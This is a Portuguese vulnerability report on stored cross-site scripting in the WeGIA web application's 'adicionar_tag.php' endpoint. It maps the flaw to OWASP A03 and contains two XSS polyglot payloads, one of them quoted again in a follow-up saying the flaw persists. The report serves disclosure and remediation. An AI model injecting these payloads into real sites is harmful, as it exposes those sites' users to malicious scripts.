Relatório de Vulnerabilidade - Cross-Site Scripting (XSS) Stored no endpoint 'adicionar_tag.php'

[lislovelly]

Visão geral da vulnerabilidade

Foi identificada uma vulnerabilidade de segurança na aplicação web WeGIA, no endpoint 'adicionar_tag.php', permitindo que um atacante injete scripts maliciosos. Os scripts injetados podem ser armazenados no servidor e são executados automaticamente sempre que a página afetada é acessada por um usuário.

Detalhes técnicos

Endpoint vulnerável (XSS Armazenado):
POST /html/socio/sistema/adicionar_tag.php

Payloads maliciosos:

;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

JavaScript://%250Aalert?.(1)//'/\'/"/\"//*\/*%26apos;)/<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/${//;{/*/(alert)(1)}//><Base/Href=//X55.is\76-->

Prova de Conceito (PoC)

XSS armazenado no servidor:

Análise:

XSS Stored: O payload malicioso é armazenado no servidor, e é executado sempre que a página afetada é acessada, comprometendo a segurança de qualquer usuário que visualize o conteúdo malicioso.

Mapeamento OWASP Top 10:

A03:2021 – Injeção: A falta de validação e sanitização adequada das entradas do usuário permite a injeção de scripts maliciosos, possibilitando ataques de XSS armazenado.

[lislovelly]

A vulnerabilidade persiste:

Payload injetado:

;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>